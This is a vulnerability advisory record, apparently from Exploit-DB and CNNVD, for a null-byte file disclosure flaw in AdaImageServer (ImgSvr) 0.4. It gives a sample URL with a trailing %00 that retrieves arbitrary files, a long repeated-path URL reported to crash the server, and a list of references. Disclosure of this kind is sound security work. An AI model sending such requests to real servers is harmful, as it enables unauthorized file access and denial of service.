https://www.exploit-db.com/exploits/23906
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-434

AdaImageServer(ImgSvr)0.4版本中存在漏洞。攻击者可以借助带有拖尾%00（空）的HTTP请求查看目录或者下载文件。

source: http://www.securityfocus.com/bid/10027/info

A vulnerability has been reported in the ImgSvr server software that may allow a remote user to the retrieve arbitrary files from the web server root directory and any subdirectories therein.

An attacker may leverage this issue to gain access to arbitrary scripts contained within the server root directory. 

http://www.example.org:1234/someDirectory/fileName%00

The following has been reported to crash the affected server:
http://127.0.0.1:1234/%00/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/

来源:SECUNIA
名称:11277
链接:http://secunia.com/advisories/11277
来源:XF
名称:imgsvr-obtain-information(15706)
链接:http://xforce.iss.net/xforce/xfdb/15706
来源:BID
名称:10027
链接:http://www.securityfocus.com/bid/10027
来源:BID
名称:10026
链接:http://www.securityfocus.com/bid/10026
来源:www.autistici.org
链接:http://www.autistici.org/fdonato/advisory/imgSvr0.4-adv.txt
来源:sourceforge.net
链接:http://sourceforge.net/project/shownotes.php?release_id=230023
来源:BUGTRAQ
名称:20040401IndexviewinginimgSvr0.4
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108083813528255&w;=2